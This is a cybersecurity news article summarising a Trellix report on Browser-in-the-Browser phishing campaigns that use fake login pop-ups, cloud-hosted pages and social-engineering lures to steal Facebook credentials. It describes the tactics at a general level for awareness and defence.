“Browser-in-the-Browser” Attack Escalates: Trellix Reports Surge in Sophisticated Facebook Phishing

The era of easily spotting phishing emails by checking the URL bar may be coming to an end. A new report from Trellix highlights a disturbing surge in sophisticated phishing campaigns targeting Facebook’s 3 billion users, utilizing a technique known as “Browser-in-the-Browser” (BitB) to make fake login pages nearly indistinguishable from the real thing.

Observed escalating in the second half of 2025, this new wave of attacks combines advanced technical deception with trusted cloud infrastructure to bypass traditional security filters and trick even vigilant users.

The most dangerous evolution identified in the report is the “Browser-in-the-Browser” technique. Instead of directing users to a suspicious URL that can be easily flagged, attackers are simulating a legitimate pop-up window entirely within the victim’s existing browser tab.

“This sophisticated method is known as the ‘Browser-in-the-Browser’ (BitB) technique,” the report explains. “It exploits the public’s familiarity with login pop-up windows to steal user credentials”.

To the user, it looks perfect. The fake window displays the correct Facebook URL, green lock icons, and trusted branding. However, “Checking the code reveals that the Facebook URL was hardcoded,” meaning the address bar is merely a visual fabrication designed to mask the credential-harvesting page underneath.

Beyond the visual trickery, attackers are upgrading their backend infrastructure. The report notes a shift towards abusing legitimate cloud platforms like Netlify and Vercel to host these phishing pages.

By hosting their attacks on reputable domains, scammers can “evade security filters and lend a false sense of security to phishing pages”. A typical attack flow might involve a fake “Meta copyright infringement” notice hosted on Netlify, which redirects users to a Vercel-hosted appeal form that eventually demands their password.

Scammers are also utilizing URL shorteners like Lnk.ink and rebrand.ly to further mask the final destination of their malicious links.

The campaigns often begin with high-pressure social engineering. Trellix observed several recurring themes:

• Fake Legal Notices: Emails disguised as communications from law firms regarding “infringing videos”.
• Account Violations: Warnings that a page or business account has violated community standards.
• Security Alerts: False alarms about unauthorized logins or system checks requiring immediate re-verification.

This evolution in tactics signals that standard user awareness training—such as “check the URL”—is no longer sufficient.

“Most critically, the emergence of the Browser-in-the-Browser (BitB) technique represents a major escalation,” the report warns. “By creating a custom-built, fake login pop-up window within the victim’s browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually”.

Defenders are urged to adopt a multi-layered defense strategy that goes beyond simple visual inspection to combat these technically complex campaigns.

Related Posts:

• Cybercriminals Target Gamers with Browser-in-the-Browser Phishing Attacks
• New Malware Campaign: Fake Java Pop-ups on WordPress Trick Users
• Beware of Fake Google Chrome Update Pop-Ups: Malicious Campaign Targets Hundreds of Websites
• Meta Unveils ‘Meta Lab’ Pop-Up Stores for New Ray-Ban Smart Glasses
• Finally! YouTube Adds ‘Hide’ Button for End-Screen Pop-Ups to Improve Viewer Experience